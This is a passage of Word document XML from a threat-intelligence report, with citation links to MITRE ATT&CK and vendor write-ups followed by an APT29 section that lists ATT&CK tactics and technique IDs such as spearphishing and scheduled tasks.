                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C756F84" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00F808AD" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6043E79A" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00F808AD" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2818F82E" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00F808AD" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60F5D281" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00F808AD" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0798C47D" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="0077286F" w:rsidRDefault="00FB171C" w:rsidP="00FB171C"/>
    <w:p w14:paraId="566343DF" w14:textId="1395AEF9" w:rsidR="00FB171C" w:rsidRDefault="008A1484" w:rsidP="00FB171C">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[1]  </w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Indictment (justice.gov)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2018]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70664A7D" w14:textId="7242341B" w:rsidR="00896477" w:rsidRDefault="00896477" w:rsidP="00FB171C">
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId50" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>XAgentOSX</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>, Software S0161 | MITRE ATT&amp;CK®</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0021166F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570CDB60" w14:textId="2CB94B46" w:rsidR="0021166F" w:rsidRDefault="0021166F" w:rsidP="0021166F">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId51" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>XAgentOSX</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">: </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Sofacy’s</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>XAgent</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> macOS Tool (paloaltonetworks.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (via Google [2017])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B897FCA" w14:textId="20CD6E80" w:rsidR="00D574E4" w:rsidRDefault="00D574E4" w:rsidP="0021166F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId52" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Forfiles</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>, Software S0193 | MITRE ATT&amp;CK®</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="70D5D9AE" w14:textId="77777777" w:rsidR="0021166F" w:rsidRDefault="0021166F" w:rsidP="00FB171C">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73302803" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="00FB171C">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16027279" w14:textId="77777777" w:rsidR="00A365EB" w:rsidRPr="00F6742A" w:rsidRDefault="00A365EB" w:rsidP="00751E97"/>
    <w:p w14:paraId="0FC01F92" w14:textId="77777777" w:rsidR="00891095" w:rsidRDefault="00891095">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F8479A" w14:textId="3CD2B380" w:rsidR="009A6B54" w:rsidRDefault="009A6B54" w:rsidP="009A6B54">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc110935510"/>
      <w:bookmarkStart w:id="52" w:name="_Toc153480852"/>
      <w:r w:rsidRPr="009A05C9">
        <w:lastRenderedPageBreak/>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>PT 2</w:t>
      </w:r>
      <w:r w:rsidR="00FC1CA5">
        <w:t>9</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="11B3831A" w14:textId="77777777" w:rsidR="00F80381" w:rsidRPr="005B4630" w:rsidRDefault="00F80381" w:rsidP="00F80381">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc153480853"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="440F1821" w14:textId="77777777" w:rsidR="00BB4629" w:rsidRPr="00BB4629" w:rsidRDefault="00BB4629" w:rsidP="00BB4629">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0016 - APT29 is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121D92AB" w14:textId="77777777" w:rsidR="00BB4629" w:rsidRPr="00BB4629" w:rsidRDefault="00BB4629" w:rsidP="00BB4629">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group ATT&amp;CK attribution is Russia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13905415" w14:textId="77777777" w:rsidR="00BB4629" w:rsidRPr="00BB4629" w:rsidRDefault="00BB4629" w:rsidP="00BB4629">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group TCERT attribution is RU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F678AE"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance ['T1589.001', 'T1595.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648076E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T1589.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Gather Victim Identity Information&gt;:Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5DCDD7"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T1595.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Active Scanning&gt;:Vulnerability Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAE6FBF"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Development ['T1586.002', 'T1588.002', 'T1587.001', 'T1584.001', 'T1583.001', 'T1587.003', 'T1583.006']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B01C68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T1586.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Compromise Accounts&gt;:Email Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2A289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T1588.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obtain Capabilities&gt;:Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126348BA"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T1587.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Develop Capabilities&gt;:Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E9B954"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T1584.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Compromise Infrastructure&gt;:Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7277700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T1583.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Acquire Infrastructure&gt;:Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B10C1C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T1587.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Develop Capabilities&gt;:Digital Certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE80E5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T1583.006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Acquire Infrastructure&gt;:Web Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7A3DD2"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access ['T1078.004', 'T1078.003', 'T1566.003', 'T1199', 'T1195.002', 'T1078', 'T1133', 'T1190', 'T1078.002', 'T1566.001', 'T1566.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A29FF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T1078.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Cloud Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE0B31B"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T1078.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Local Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2943F8DD"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T1566.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> via Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAEF8E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1199 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Trusted Relationship</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668F556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T1195.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Supply Chain Compromise&gt;:Compromise Software Supply Chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CB9BE5"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55286D5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1133 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> External Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF88C7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1190 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploit Public-Facing Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C305DA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T1078.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Domain Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6684EB7D"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9F42AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1566.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009F42AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F42AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F42AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144AF9F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T1566.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B638318"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution ['T1059.005', 'T1204.001', 'T1059.003', 'T1059.006', 'T1204.002', 'T1203', 'T1047', 'T1053.005', 'T1059.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A902D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T1059.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Visual Basic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DDD04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T1204.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798B66FD" w14:textId="77777777" w:rsidR="00BB4629" w:rsidRPr="009B5CA6" w:rsidRDefault="00BB4629" w:rsidP="00BB4629">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B5CA6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1059.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B5CA6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FAF124"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T1059.006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D01EE6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9F42AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1204.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009F42AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E230CA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1203 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation for Client Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A84D0A"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1047 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows Management Instrumentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A0363A"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4D0E6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T1059.001 :</w:t>
      </w:r>
